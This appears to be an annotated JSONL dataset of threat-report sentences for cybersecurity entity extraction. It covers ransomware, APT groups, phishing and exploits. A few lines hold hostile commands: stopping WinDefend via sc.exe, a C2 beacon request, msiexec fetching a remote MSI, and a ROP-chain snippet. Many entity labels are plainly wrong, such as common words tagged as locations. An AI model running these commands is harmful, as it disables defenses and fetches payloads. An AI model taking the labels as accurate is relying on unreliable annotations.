\"C:\\Windows\\System32\\sc.exe\" \/WindowState 0 \/CommandLine \"stop WinDefend\" \/StartDirectory \"\" \/RunAs 8 \/Run 7.","entities":[{"id":44990,"label":"FILEPATH","start_offset":313,"end_offset":339},{"id":44987,"label":"FILEPATH","start_offset":62,"end_offset":119},{"id":44988,"label":"FILEPATH","start_offset":157,"end_offset":198},{"id":44989,"label":"FILEPATH","start_offset":245,"end_offset":297},{"id":46724,"label":"SOFTWARE","start_offset":47,"end_offset":58}],"relations":[],"Comments":[]} +{"id":11105,"text":"The targets would be prompted to install a legitimate version of McAfee anti-virus software from GitHub, while malware was simultaneously silently installed to the system.","entities":[],"relations":[],"Comments":[]} +{"id":12207,"text":"We received leads from Graphika that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} +{"id":9578,"text":"GET http:\/\/{C2}\/Index.php?vubc={identity} HTTP\/1.1","entities":[{"id":29372,"label":"URL","start_offset":4,"end_offset":40}],"relations":[],"Comments":[]} +{"id":13686,"text":"They will then send a fraudulent wire transfer request to trick recipients into wiring money into the criminals\u2019 accounts.","entities":[],"relations":[],"Comments":[]} +{"id":4067,"text":"HTShell HTShell is a simple backdoor that is developed using the Mongoose framework (version 6.15).","entities":[{"id":49901,"label":"malware","start_offset":0,"end_offset":7},{"id":49902,"label":"malware","start_offset":8,"end_offset":15},{"id":49903,"label":"tools","start_offset":65,"end_offset":98}],"relations":[],"Comments":[]} +{"id":2908,"text":"_local10 = this.m_ZwProtectAddr; _local41 = _local6; s[_local28][((((_local6 - _local12) \/ 4) - 2) - 4)] = (_local41 & 0xFFFFF000); s[_local28][((((_local6 - _local12) \/ 4) - 1) - 4)] = 0x3000; s[_local28][((_local6 - _local12) \/ 4)] = _local10; s[_local28][(((_local6 - _local12) \/ 4) + 1)] = (_local41 + 28); The code above shows the Flash code setting up the ROP chain to bypass DEP and includes another interesting marker.","entities":[{"id":48084,"label":"SOFTWARE","start_offset":342,"end_offset":347}],"relations":[],"Comments":[]} +{"id":7878,"text":"The other 94.2% of applications place no restrictions on the backup of their internal storage data.","entities":[],"relations":[],"Comments":[]} +{"id":6406,"text":"The \"Brute Ratel C4 Tool Command and Control Traffic Detections\" signature is threat ID 86647.","entities":[],"relations":[],"Comments":[]} +{"id":2323,"text":"Upon analysis, we realized this binary contained code which could escape the Safari sandbox, elevate privileges, and download a second stage from the C2.","entities":[{"id":47398,"label":"SOFTWARE","start_offset":77,"end_offset":83}],"relations":[],"Comments":[]} +{"id":5931,"text":"We assess that these campaigns delivered ALIEN, a simple Android malware in charge of loading PREDATOR, an Android implant described by CitizenLab in December 2021.","entities":[{"id":18237,"label":"malware","start_offset":41,"end_offset":46}],"relations":[],"Comments":[]} +{"id":650,"text":"Once executed, it overwrites the Master Boot Record and creates a scheduled task to reboot the system.","entities":[{"id":46233,"label":"SOFTWARE","start_offset":33,"end_offset":51},{"id":46234,"label":"attack-pattern","start_offset":66,"end_offset":80}],"relations":[],"Comments":[]} +{"id":10362,"text":"If these samples are indeed related to MuddyWater, this means that the threat actors behind MuddyWater are continuously evolving their tools and techniques to make them more effective and persistent.","entities":[{"id":31543,"label":"location","start_offset":17,"end_offset":20},{"id":31544,"label":"threat-actor","start_offset":39,"end_offset":49},{"id":31545,"label":"location","start_offset":56,"end_offset":61},{"id":31546,"label":"threat-actor","start_offset":92,"end_offset":102},{"id":31547,"label":"location","start_offset":103,"end_offset":106},{"id":31548,"label":"location","start_offset":141,"end_offset":144},{"id":31549,"label":"location","start_offset":164,"end_offset":168},{"id":31550,"label":"location","start_offset":184,"end_offset":187}],"relations":[],"Comments":[]} +{"id":6611,"text":"General Mitigations:","entities":[],"relations":[],"Comments":[]} +{"id":7440,"text":"At this point, the user is faced with a legitimate Google site\u2014since all OAuth approvals are done on the site of the service provider\u2014but the application itself is part of a phishing scheme.","entities":[{"id":23131,"label":"location","start_offset":8,"end_offset":13},{"id":23133,"label":"location","start_offset":89,"end_offset":92},{"id":23134,"label":"attack-pattern","start_offset":174,"end_offset":182}],"relations":[],"Comments":[]} +{"id":13801,"text":" Figure 8.","entities":[],"relations":[],"Comments":[]} +{"id":13764,"text":"Table: The sizes of functions Table:","entities":[],"relations":[],"Comments":[]} +{"id":4907,"text":"We have observed that actors use various types of malware based on personal preference, most of which are easily available on Github.","entities":[{"id":50922,"label":"SOFTWARE","start_offset":126,"end_offset":132}],"relations":[],"Comments":[]} +{"id":4944,"text":"Attackers used the Munich Security and the Think-20 (T20) Italy conferences as lures in non-malicious first contact email messages to get users to respond.","entities":[],"relations":[],"Comments":[]} +{"id":2072,"text":"In one of the videos, we actually observed the threat actor performing a DNS leak test on his Android phone.","entities":[],"relations":[],"Comments":[]} +{"id":3906,"text":"These malicious code pieces can be written in ASP, PHP, and JSP, or any script that can execute a system command with a parameter that can pass through the web.","entities":[],"relations":[],"Comments":[]} +{"id":12012,"text":"Cookie Theft, also known as \u201cpass-the-cookie attack,\u201d is a session hijacking technique that enables access to user accounts with session cookies stored in the browser.","entities":[{"id":37163,"label":"attack-pattern","start_offset":59,"end_offset":76}],"relations":[],"Comments":[]} +{"id":11473,"text":"While we continue to fight these threats on a technical level, the providers of these capabilities operate openly in democratic countries.","entities":[],"relations":[],"Comments":[]} +{"id":4812,"text":"In this case, the Android app name was stopwar.apk (com.ddos.stopwar) and was distributed from the website stopwar.pro.","entities":[{"id":50733,"label":"malware","start_offset":39,"end_offset":50},{"id":50732,"label":"SOFTWARE","start_offset":18,"end_offset":29},{"id":50734,"label":"malware","start_offset":52,"end_offset":68},{"id":50735,"label":"DOMAIN","start_offset":107,"end_offset":118}],"relations":[{"id":999,"from_id":50735,"to_id":50734,"type":"hosts"},{"id":1000,"from_id":50735,"to_id":50733,"type":"hosts"}],"Comments":[]} +{"id":9316,"text":"In addition, the skimmer Mirrorthief used in the attack is very different from the others since it\u2019s specially designed to skim PrismWeb\u2019s payment form.","entities":[],"relations":[],"Comments":[]} +{"id":3440,"text":" Unit 42 recommends customers upgrade to the latest release of F5 BIG-IP products.","entities":[{"id":10409,"label":"identity","start_offset":2,"end_offset":9},{"id":49205,"label":"tools","start_offset":64,"end_offset":73}],"relations":[],"Comments":[]} +{"id":4137,"text":" Tool name Purpose Description SharpHound AD Discovery Discovery tool to understand the relationship in an AD environment FRPC Intranet Penetration Fast reverse proxy to help expose a local server behind a NAT or firewall to the internet Chisel Intranet Penetration Fast TCP\/UDP tunnel RClone Exfiltration A command-line program to sync files and directories to and from different cloud storage providers Credential Dumping","entities":[{"id":49930,"label":"attack-pattern","start_offset":406,"end_offset":424},{"id":49931,"label":"tools","start_offset":31,"end_offset":41},{"id":49932,"label":"malware","start_offset":238,"end_offset":244},{"id":49933,"label":"tools","start_offset":286,"end_offset":292}],"relations":[],"Comments":[]} +{"id":13500,"text":"This option is particularly interesting since it would be extremely difficult under normal circumstances to gather the contents of a mailbox without any user interaction, which points to possibilities such as insider assistance or even the compromise of the email provider\u2019s systems.","entities":[],"relations":[],"Comments":[]} +{"id":123,"text":" Tags Cloud | Cyber Crime | Expert Perspective | Cyber Threats | APT & Targeted Attacks | Network | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} +{"id":2694,"text":"LockBit\u2019s continuation with operations and its next iteration coming up on the horizon means that organizations and their security teams need to stay vigilant in the ever-evolving threat landscape.","entities":[{"id":47927,"label":"threat-actor","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} +{"id":1458,"text":"The Y-axis is the number of certificates.","entities":[],"relations":[],"Comments":[]} +{"id":1092,"text":"Lets say you want to update an Internet Explorer (IE) cookie file, adding a unique identifier for use later.","entities":[{"id":44932,"label":"SOFTWARE","start_offset":31,"end_offset":53}],"relations":[],"Comments":[]} +{"id":11879,"text":"After a fingerprinting phase, similar to the one used with the Chrome exploit above, users were served an Internet Explorer 0-day.","entities":[{"id":36616,"label":"attack-pattern","start_offset":8,"end_offset":22},{"id":36617,"label":"location","start_offset":45,"end_offset":48}],"relations":[],"Comments":[]} +{"id":10019,"text":"\u2014 TROJ_SIDELOADR.ENC bcfacc1ad5686aee3a9d8940e46d32af62f8e1cd1631653795778736b67b6d6e","entities":[{"id":30593,"label":"SHA2","start_offset":21,"end_offset":85}],"relations":[],"Comments":[]} +{"id":5433,"text":"If it is suspected that an organization\u2019s devices have been infected with Cyclops Blink, it is best to get a new router.","entities":[{"id":51434,"label":"malware","start_offset":74,"end_offset":87}],"relations":[],"Comments":[]} +{"id":5664,"text":"The Glupteba malware family is primarily distributed through pay per install (PPI) networks and via traffic purchased from traffic distribution systems (TDS).","entities":[{"id":17449,"label":"malware","start_offset":4,"end_offset":12},{"id":17450,"label":"location","start_offset":92,"end_offset":95}],"relations":[],"Comments":[]} +{"id":13906,"text":"The DarkSide ransomware shares many similarities with REvil in this step of the process, including the structure of ransom notes and the use of PowerShell to execute a command that deletes shadow copies from the network.","entities":[{"id":48722,"label":"malware","start_offset":4,"end_offset":13},{"id":48723,"label":"malware","start_offset":54,"end_offset":59},{"id":48724,"label":"tools","start_offset":144,"end_offset":155}],"relations":[],"Comments":[]} +{"id":10965,"text":"Our products are designed with robust built-in security features, like Gmail protections against phishing and Safe Browsing in Chrome, but we still dedicate significant resources to developing new tools and technology to help identify, track and stop this kind of activity.","entities":[{"id":33361,"label":"location","start_offset":13,"end_offset":16},{"id":33362,"label":"location","start_offset":47,"end_offset":55},{"id":33364,"label":"attack-pattern","start_offset":97,"end_offset":105},{"id":33365,"label":"location","start_offset":106,"end_offset":109},{"id":33366,"label":"threat-actor","start_offset":110,"end_offset":114},{"id":33367,"label":"location","start_offset":203,"end_offset":206},{"id":33368,"label":"location","start_offset":242,"end_offset":245},{"id":33369,"label":"malware","start_offset":246,"end_offset":250}],"relations":[],"Comments":[]} +{"id":11306,"text":"In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.","entities":[{"id":34552,"label":"threat-actor","start_offset":41,"end_offset":56},{"id":34553,"label":"location","start_offset":57,"end_offset":61},{"id":34557,"label":"location","start_offset":126,"end_offset":129}],"relations":[],"Comments":[]} +{"id":4171,"text":"After checking the backdoor SmileSvr, we found that there was a code similarity between it and Troj_YAHAMAM, which was used by Earth Centaur in an earlier operation.","entities":[{"id":49973,"label":"malware","start_offset":95,"end_offset":107},{"id":49974,"label":"threat-actor","start_offset":127,"end_offset":140}],"relations":[{"id":897,"from_id":49974,"to_id":49973,"type":"uses"}],"Comments":[]} +{"id":9931,"text":"IP addresses associated with a few private VPN exit nodes connected to APT33","entities":[{"id":30317,"label":"threat-actor","start_offset":71,"end_offset":76}],"relations":[],"Comments":[]} +{"id":223,"text":" From January to late February, it appears that the number of Ukraine-related phishing and scam sites largely followed a similar trend as Ukraine-related internet searches; however, the number of phishing and scam sites has continued to rise through mid-late March as the situation remains ongoing.","entities":[{"id":737,"label":"attack-pattern","start_offset":78,"end_offset":86},{"id":741,"label":"attack-pattern","start_offset":196,"end_offset":204},{"id":45920,"label":"TIME","start_offset":6,"end_offset":13},{"id":45925,"label":"attack-pattern","start_offset":209,"end_offset":219},{"id":45921,"label":"TIME","start_offset":17,"end_offset":30},{"id":45922,"label":"location","start_offset":62,"end_offset":69},{"id":45923,"label":"location","start_offset":138,"end_offset":145}],"relations":[],"Comments":[]} +{"id":250,"text":"We strongly recommend that users be alert to the possibility of cybersquatting domains.","entities":[{"id":45946,"label":"attack-pattern","start_offset":64,"end_offset":78}],"relations":[],"Comments":[]} +{"id":4144,"text":"The usage is as follows: Intranet Penetration","entities":[],"relations":[],"Comments":[]} +{"id":2070,"text":" The videos found gave us insight into x4k operations before moving into ransomware activity specifically.","entities":[{"id":45249,"label":"threat-actor","start_offset":39,"end_offset":43}],"relations":[],"Comments":[]} +{"id":7272,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} +{"id":5312,"text":" Figure 1.","entities":[],"relations":[],"Comments":[]} +{"id":778,"text":"Figure 10: object is in the free list now ","entities":[],"relations":[],"Comments":[]} +{"id":14206,"text":"Tools that exploited vulnerabilities in Internet of Things (IoT) devices were also made available on GitHub.","entities":[],"relations":[],"Comments":[]} +{"id":781,"text":"When page heap is turned on, the system allows only one object in one memory page.","entities":[],"relations":[],"Comments":[]} +{"id":13427,"text":"We look forward to continuing our work in this space and advancing the safety and security of our users around the world.","entities":[{"id":41787,"label":"location","start_offset":53,"end_offset":56},{"id":41788,"label":"tools","start_offset":71,"end_offset":77},{"id":41789,"label":"location","start_offset":78,"end_offset":81},{"id":41790,"label":"location","start_offset":82,"end_offset":90},{"id":41791,"label":"location","start_offset":115,"end_offset":120}],"relations":[],"Comments":[]} +{"id":4350,"text":"Spear-phishing email from early August","entities":[{"id":50133,"label":"attack-pattern","start_offset":0,"end_offset":14},{"id":50134,"label":"TIME","start_offset":26,"end_offset":38}],"relations":[],"Comments":[]} +{"id":1159,"text":"However, the research necessary to conclusively prove this hypothesis would be very time consuming and provide little other benefit.","entities":[],"relations":[],"Comments":[]} +{"id":136,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} +{"id":9499,"text":"Requesting a URL therefore results in executing the corresponding code on an infected system.","entities":[],"relations":[],"Comments":[]} +{"id":2468,"text":"The pie chart in Figure 13 shows a high-level breakdown of the most common filenames.","entities":[],"relations":[],"Comments":[]} +{"id":5014,"text":"Financially motivated and criminal actors are also using current events as a means for targeting users.","entities":[],"relations":[],"Comments":[]} +{"id":6548,"text":"The group, which was primarily motivated by profit, is noted for utilizing self-developed technically-proficient tools for their attacks.","entities":[],"relations":[],"Comments":[]} +{"id":12721,"text":"Implement private keys authentication for Secure Shell (SSH) on the client side for stronger access control security.","entities":[{"id":39504,"label":"attack-pattern","start_offset":10,"end_offset":22},{"id":39505,"label":"location","start_offset":49,"end_offset":54},{"id":39506,"label":"location","start_offset":108,"end_offset":116}],"relations":[],"Comments":[]} +{"id":13197,"text":"Like other versions, it uses the DNS protocol to communicate with the backdoor controller.","entities":[],"relations":[],"Comments":[]} +{"id":13867,"text":"Even the DarkSide actors themselves admit that they just buy access to company networks \u2014 they have no idea how access was acquired.","entities":[{"id":43011,"label":"malware","start_offset":9,"end_offset":17},{"id":43012,"label":"identity","start_offset":52,"end_offset":56},{"id":43013,"label":"location","start_offset":57,"end_offset":60}],"relations":[],"Comments":[]} +{"id":1148,"text":" The first is very likely due to the similarities present in the order of keys hit.","entities":[],"relations":[],"Comments":[]} +{"id":14199,"text":"Increase attack surface enumeration across IoT, Industrial IoT, mobile and cloud; Expand or deploy a zero trust architecture framework and; Fortify your backups","entities":[],"relations":[],"Comments":[]} +{"id":13706,"text":"Trend Micro protects both small- to medium-sized businesses and enterprises against phishing- and BEC-related emails.","entities":[{"id":51757,"label":"attack-pattern","start_offset":98,"end_offset":101},{"id":48799,"label":"attack-pattern","start_offset":84,"end_offset":92}],"relations":[],"Comments":[]} +{"id":692,"text":"Leveraging this logical vulnerability, known as CVE-2018-8174, allows attackers to execute arbitrary HTML\/JavaScript\/VBScript.","entities":[{"id":46270,"label":"vulnerability","start_offset":48,"end_offset":61},{"id":46271,"label":"attack-pattern","start_offset":83,"end_offset":125}],"relations":[],"Comments":[]} +{"id":11809,"text":"We warn users when we suspect a government-backed threat like APT35 is targeting them.","entities":[{"id":36425,"label":"threat-actor","start_offset":62,"end_offset":67},{"id":36426,"label":"location","start_offset":81,"end_offset":85}],"relations":[],"Comments":[]} +{"id":9886,"text":"For example, for at least two years the group used the private website of a high-ranking European politician (a member of her country\u2019s defense committee) to send spear phishing emails to companies that are part of the supply chain of oil products.","entities":[{"id":30148,"label":"attack-pattern","start_offset":163,"end_offset":177},{"id":30149,"label":"location","start_offset":203,"end_offset":206},{"id":30150,"label":"location","start_offset":219,"end_offset":225},{"id":30151,"label":"location","start_offset":235,"end_offset":238}],"relations":[],"Comments":[]} +{"id":1994,"text":"Due to the surge of this malicious activity, we\u2019ve created this threat assessment for overall awareness.","entities":[],"relations":[],"Comments":[]} +{"id":7685,"text":"Emails with an attached .ISO image is an .LNK file that uses command line msiexec to execute an MSI file from a URL such as hxxp:\/\/139[.]180[.]195[.]36\/pm2.","entities":[],"relations":[],"Comments":[]} +{"id":709,"text":"Instead, here are eight things I am doing right now to protect Palo Alto Networks and my home (and mother-in-law) and that you should be doing, too:","entities":[{"id":46277,"label":"identity","start_offset":63,"end_offset":81}],"relations":[],"Comments":[]} +{"id":14094,"text":"When doing attribution, finding code sharing between different samples is one of the most desired discoveries.","entities":[],"relations":[],"Comments":[]} +{"id":5503,"text":"One of its file stealers, swissknife2, abuses a cloud storage service as a repository of exfiltrated files.","entities":[{"id":51516,"label":"malware","start_offset":16,"end_offset":24},{"id":51517,"label":"malware","start_offset":26,"end_offset":37}],"relations":[],"Comments":[]} +{"id":1788,"text":"In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability Log4shell using Nmap NSE script.","entities":[{"id":45130,"label":"vulnerability","start_offset":103,"end_offset":112},{"id":45129,"label":"tools","start_offset":119,"end_offset":127},{"id":45131,"label":"vulnerability","start_offset":83,"end_offset":88}],"relations":[],"Comments":[]} +{"id":3035,"text":"For every kind of device or system, you should think about and understand how you can do updates for: a.","entities":[],"relations":[],"Comments":[]} +{"id":3915,"text":"Through the ASPX file, malicious actors can establish a foothold in affected public-facing Outlook Web App (OWA) servers and send remote commands through them.","entities":[{"id":49770,"label":"SOFTWARE","start_offset":91,"end_offset":112}],"relations":[],"Comments":[]} +{"id":7454,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} +{"id":3968,"text":"Do not use the same password for multiple applications or websites.","entities":[],"relations":[],"Comments":[]} +{"id":13579,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} +{"id":1099,"text":"It can then read, tweak, and write the file without fear of any clobbering by other processes.","entities":[],"relations":[],"Comments":[]} +{"id":2637,"text":"And the LockBit 2.0 RaaS leak site has the most significant number of published victims, with over 850 in total.","entities":[{"id":45639,"label":"threat-actor","start_offset":8,"end_offset":19}],"relations":[],"Comments":[]} +{"id":3047,"text":"We have recently been investigating an antivirus app in the Google Play store that was displaying fake virus detection results to scare users into purchasing a premium service.","entities":[{"id":48125,"label":"SOFTWARE","start_offset":60,"end_offset":71}],"relations":[],"Comments":[]} +{"id":6202,"text":"We have reported the vulnerability to the company that developed the webmail system, which informed us that the vulnerability had been fixed since January 2020.","entities":[],"relations":[],"Comments":[]} +{"id":964,"text":"SMS body and sender number read ","entities":[],"relations":[],"Comments":[]} +{"id":13682,"text":"The landing page index.html has a dummy speech functio Figure 8.","entities":[],"relations":[],"Comments":[]} +{"id":2636,"text":"As of May 25, LockBit 2.0 accounted for 46% of all ransomware-related breach events for 2022.","entities":[{"id":47817,"label":"TIME","start_offset":6,"end_offset":12},{"id":47818,"label":"malware","start_offset":14,"end_offset":25},{"id":47819,"label":"TIME","start_offset":88,"end_offset":92}],"relations":[],"Comments":[]} +{"id":13950,"text":"Phase 1 (+ possibly Phase 2 or Phase 3) + directly emailing the victim\u2019s customer base or having contracted call centers contact customers.","entities":[],"relations":[],"Comments":[]} +{"id":2453,"text":"Of these, only the two commands involving \/etc\/passwd would possibly suggest malicious intent for exploitation \u2013 the rest of the commands suggest general scanning activity.","entities":[{"id":47521,"label":"FILEPATH","start_offset":42,"end_offset":53}],"relations":[],"Comments":[]} +{"id":8796,"text":"As part of our wider tracking of APT31 activity, we've also seen them deploy targeted malware campaigns.","entities":[{"id":27231,"label":"location","start_offset":65,"end_offset":69},{"id":27232,"label":"attack-pattern","start_offset":77,"end_offset":93}],"relations":[],"Comments":[]} +{"id":7050,"text":"The result is a file with the following structure: Size of the 32-bit shellcode 32-bit shellcode Size of the 64-bit shellcode 64-bit shellcode Table 2.","entities":[{"id":22098,"label":"location","start_offset":40,"end_offset":49},{"id":22099,"label":"identity","start_offset":70,"end_offset":73},{"id":22100,"label":"identity","start_offset":88,"end_offset":91},{"id":22101,"label":"identity","start_offset":118,"end_offset":121},{"id":22102,"label":"identity","start_offset":136,"end_offset":139}],"relations":[],"Comments":[]} +{"id":8579,"text":"The attackers embed javascript into phishing pages that notify them when the page has been loaded.","entities":[{"id":26517,"label":"attack-pattern","start_offset":36,"end_offset":44},{"id":26518,"label":"location","start_offset":63,"end_offset":67},{"id":26519,"label":"location","start_offset":77,"end_offset":81}],"relations":[],"Comments":[]} +{"id":157,"text":"In the early days of Window Vista, Microsoft enabled aggressive security checking to ensure user-initiated actions were legitimate.","entities":[{"id":45849,"label":"SOFTWARE","start_offset":21,"end_offset":33},{"id":45850,"label":"identity","start_offset":35,"end_offset":44}],"relations":[],"Comments":[]} +{"id":2842,"text":" There is no consensus in the industry on what the delivery method\/initial infection vector is.","entities":[],"relations":[],"Comments":[]} +{"id":12774,"text":"PLEAD uses spear-phishing emails to deliver and install their backdoor, either as an attachment or through links to cloud storage services.","entities":[{"id":39746,"label":"location","start_offset":11,"end_offset":16},{"id":39747,"label":"attack-pattern","start_offset":17,"end_offset":25},{"id":39748,"label":"location","start_offset":44,"end_offset":47},{"id":39749,"label":"location","start_offset":116,"end_offset":121}],"relations":[],"Comments":[]} +{"id":7072,"text":"After analysis, it appears that this rootkit\u2019s behavior is very similar to that of the NDISProxy driver and remote access trojan (RAT).","entities":[{"id":22153,"label":"attack-pattern","start_offset":37,"end_offset":44},{"id":22154,"label":"location","start_offset":97,"end_offset":103},{"id":22155,"label":"location","start_offset":104,"end_offset":107},{"id":22156,"label":"location","start_offset":108,"end_offset":114}],"relations":[],"Comments":[]} +{"id":1433,"text":"If they haven\u2019t already","entities":[],"relations":[],"Comments":[]} +{"id":3256,"text":"Figures 18 and 19 show how the malware sends the \u201cjoin\u201d event to initialize C&C communication and attach the victim\u2019s encrypted data.","entities":[],"relations":[],"Comments":[]} +{"id":7573,"text":" Figure 5. FlawedAmmyy downloader Figure 6.","entities":[{"id":23619,"label":"malware","start_offset":11,"end_offset":22}],"relations":[],"Comments":[]} +{"id":12348,"text":"In one example, attackers impersonated McAfee.","entities":[],"relations":[],"Comments":[]} +{"id":5314,"text":"Inferred mod_t structure; the last member is unknown.","entities":[],"relations":[],"Comments":[]} +{"id":14265,"text":"Figure 1. Tweets that mention Virtual Girlfriend and the short link of hxxp:\/\/miakhalifagame[.]com\/ Maikspy on the Android platform Figure 2.","entities":[{"id":48479,"label":"URL","start_offset":71,"end_offset":99},{"id":48480,"label":"malware","start_offset":100,"end_offset":108},{"id":48481,"label":"SOFTWARE","start_offset":115,"end_offset":123}],"relations":[{"id":427,"from_id":48479,"to_id":48480,"type":"related-to"},{"id":428,"from_id":48480,"to_id":48481,"type":"targets"}],"Comments":[]} +{"id":1914,"text":"These images are stored in the location\/sdcard\/Android\/data\/ch.threema.app\/DataData directory, while the \u201cdropper\u201d or the malicious application working in the background uploads the images to the C&C for the threat actor to access.","entities":[{"id":45177,"label":"FILEPATH","start_offset":39,"end_offset":83},{"id":45178,"label":"Infrastucture","start_offset":196,"end_offset":199}],"relations":[],"Comments":[]} +{"id":3671,"text":"However, some techniques are only used by one of them, as we discuss in the subsequent sections.","entities":[],"relations":[],"Comments":[]} +{"id":4076,"text":"If the C&C server receives the request with the special cookie value, it can verify that the request comes from its client applications.","entities":[],"relations":[],"Comments":[]} +{"id":7643,"text":"For one thing, it has a different style of VBA macro.","entities":[],"relations":[],"Comments":[]} +{"id":13423,"text":"We would also like to thank Project Zero for their technical assistance in helping analyze these bugs.","entities":[],"relations":[],"Comments":[]} +{"id":13926,"text":"After the Colonial Pipeline attack, DarkSide released a statement on one of its leak sites clarifying that the group did not wish to create problems for society and that its goal was simply to make money.","entities":[{"id":48755,"label":"threat-actor","start_offset":36,"end_offset":45}],"relations":[],"Comments":[]} +{"id":1877,"text":"All consumer and business antivirus versions of Avast and AVG detect and block this AvosLocker ransomware variant, so our users are protected from this attack vector.","entities":[{"id":47003,"label":"SOFTWARE","start_offset":48,"end_offset":53},{"id":47004,"label":"SOFTWARE","start_offset":58,"end_offset":61},{"id":47005,"label":"malware","start_offset":84,"end_offset":94}],"relations":[],"Comments":[]} +{"id":2134,"text":"However with active PoC available we can expect at the minimum probing, if not active exploitation of this vulnerability in the near term.","entities":[],"relations":[],"Comments":[]} +{"id":7773,"text":" Figure 21.","entities":[],"relations":[],"Comments":[]} +{"id":13052,"text":"Apple Security Chief Maintains Innocence After Bribery Charges","entities":[{"id":48884,"label":"identity","start_offset":0,"end_offset":20}],"relations":[],"Comments":[]} +{"id":1954,"text":"Trend Micro\u2019s Mobile App Reputation Service (MARS) covers Android and iOS threats using leading sandbox and machine learning technologies.","entities":[{"id":47075,"label":"SOFTWARE","start_offset":58,"end_offset":65},{"id":47074,"label":"SOFTWARE","start_offset":0,"end_offset":50},{"id":47076,"label":"SOFTWARE","start_offset":70,"end_offset":74}],"relations":[],"Comments":[]} +{"id":10378,"text":"Indicators of Compromise (IoCs) Detected as W2KM_DLOADR.UHAOEEN - 240b7d2825183226af634d3801713b0e0f409eb3e1e48e1d36c96d2b03d8836b Tags APT & Targeted Attacks | Endpoints | Research | Articles, News, Reports | Network","entities":[{"id":31603,"label":"MD5","start_offset":66,"end_offset":130},{"id":31604,"label":"location","start_offset":144,"end_offset":147}],"relations":[],"Comments":[]} +{"id":2168,"text":"They also recommend ensuring cloud-delivered protections and automatic sample submission for Microsoft Defender are enabled.","entities":[{"id":47301,"label":"SOFTWARE","start_offset":93,"end_offset":111}],"relations":[],"Comments":[]} +{"id":10624,"text":"They then uploaded these modified apps to the Play Store using their own attacker-controlled developer accounts.","entities":[],"relations":[],"Comments":[]} +{"id":3832,"text":"This file contains one export function \u2014 either \u201ccrt_main\u201d or \u201clena_main\u201d Figure 9.","entities":[],"relations":[],"Comments":[]} +{"id":4269,"text":"Left: Confucius group, Middle: Hangover group, Right: Unnamed group","entities":[{"id":50071,"label":"threat-actor","start_offset":6,"end_offset":21},{"id":50072,"label":"threat-actor","start_offset":31,"end_offset":45},{"id":50073,"label":"threat-actor","start_offset":54,"end_offset":67}],"relations":[],"Comments":[]} +{"id":14118,"text":"We can see how the UTC+9 time zone matches those previously attributed to APT37 and those from Operation Earth Kitsune.","entities":[{"id":48182,"label":"location","start_offset":19,"end_offset":34},{"id":48183,"label":"threat-actor","start_offset":74,"end_offset":80},{"id":48184,"label":"campaign","start_offset":95,"end_offset":118}],"relations":[],"Comments":[]} +{"id":9716,"text":"m_pixel_ratio)","entities":[],"relations":[],"Comments":[]} +{"id":13697,"text":"Deflect company intrusions through InfoSec education.","entities":[],"relations":[],"Comments":[]} +{"id":14347,"text":"It was capable of recording phone calls and stealing information such as the device\u2019s location, SMS, contacts, WhatsApp database, and record sound around the affected device.","entities":[{"id":51798,"label":"SOFTWARE","start_offset":111,"end_offset":119}],"relations":[],"Comments":[]} +{"id":4714,"text":"We observed fewer than three dozen installs of this spyware.","entities":[],"relations":[],"Comments":[]} +{"id":2928,"text":"This is a method attackers have used for years to deliver malware and they are using it now to get coinmining software on to people\u2019s systems illicitly.","entities":[],"relations":[],"Comments":[]} +{"id":2193,"text":"Each file would drop and execute the full or light version of the legitimate video player respective to the file name.","entities":[],"relations":[],"Comments":[]} +{"id":768,"text":" Figure 4. st_ProtecFreeManageHeap Figure 5 provides an alternate view of the structure in a C style code block.","entities":[],"relations":[],"Comments":[]} +{"id":5062,"text":"While TAG has previously observed this technique being used by multiple government-backed actors, the media picked up on this blog post, publishing several stories highlighting this phishing capability.","entities":[{"id":51168,"label":"identity","start_offset":6,"end_offset":9}],"relations":[],"Comments":[]} +{"id":7146,"text":"Targets","entities":[],"relations":[],"Comments":[]} +{"id":8095,"text":"We speculate that these apps have been active since March 2019 based on the certificate information on one of the apps.","entities":[],"relations":[],"Comments":[]} +{"id":4948,"text":"We\u2019ve disrupted attacks using Google Drive, App Scripts, and Sites pages in these campaigns as APT35 tries to get around our defenses.","entities":[{"id":50972,"label":"threat-actor","start_offset":95,"end_offset":100},{"id":50971,"label":"SOFTWARE","start_offset":30,"end_offset":42}],"relations":[],"Comments":[]} +{"id":2373,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} +{"id":10848,"text":"Modular Functionality of the backdoor","entities":[],"relations":[],"Comments":[]} +{"id":3689,"text":"Some functions that are needed for the attack require admin privileges.","entities":[],"relations":[],"Comments":[]} +{"id":3543,"text":"The Trend Micro\u2122 Deep Discovery\u2122 solution provides detection, in-depth analysis, and proactive response to today\u2019s stealthy malware and targeted attacks in real time.","entities":[{"id":49319,"label":"identity","start_offset":4,"end_offset":15},{"id":49320,"label":"tools","start_offset":17,"end_offset":31}],"relations":[],"Comments":[]} +{"id":10509,"text":"And as others have reported, we\u2019re seeing a resurgence in COVID-related hacking and phishing attempts from numerous commercial and government-backed attackers.","entities":[{"id":31955,"label":"location","start_offset":0,"end_offset":3},{"id":31956,"label":"location","start_offset":80,"end_offset":83},{"id":31957,"label":"attack-pattern","start_offset":84,"end_offset":92},{"id":31958,"label":"location","start_offset":127,"end_offset":130}],"relations":[],"Comments":[]} +{"id":2929,"text":" The attackers\u2019 use of URL shortners enables our Unit 42 researchers to get an idea of the size, scope, and scale of this operation.","entities":[{"id":48099,"label":"identity","start_offset":49,"end_offset":68}],"relations":[],"Comments":[]} +{"id":3669,"text":"For lateral movement, the malware abuses remote and system administration tools.","entities":[{"id":49458,"label":"attack-pattern","start_offset":4,"end_offset":20},{"id":49459,"label":"attack-pattern","start_offset":34,"end_offset":79}],"relations":[],"Comments":[]} +{"id":14139,"text":"Unsurprisingly, the SYSTEM_ADMIN hours perfectly line up with the daily working hours at UTC+9.","entities":[{"id":48200,"label":"TIME","start_offset":89,"end_offset":94}],"relations":[],"Comments":[]} 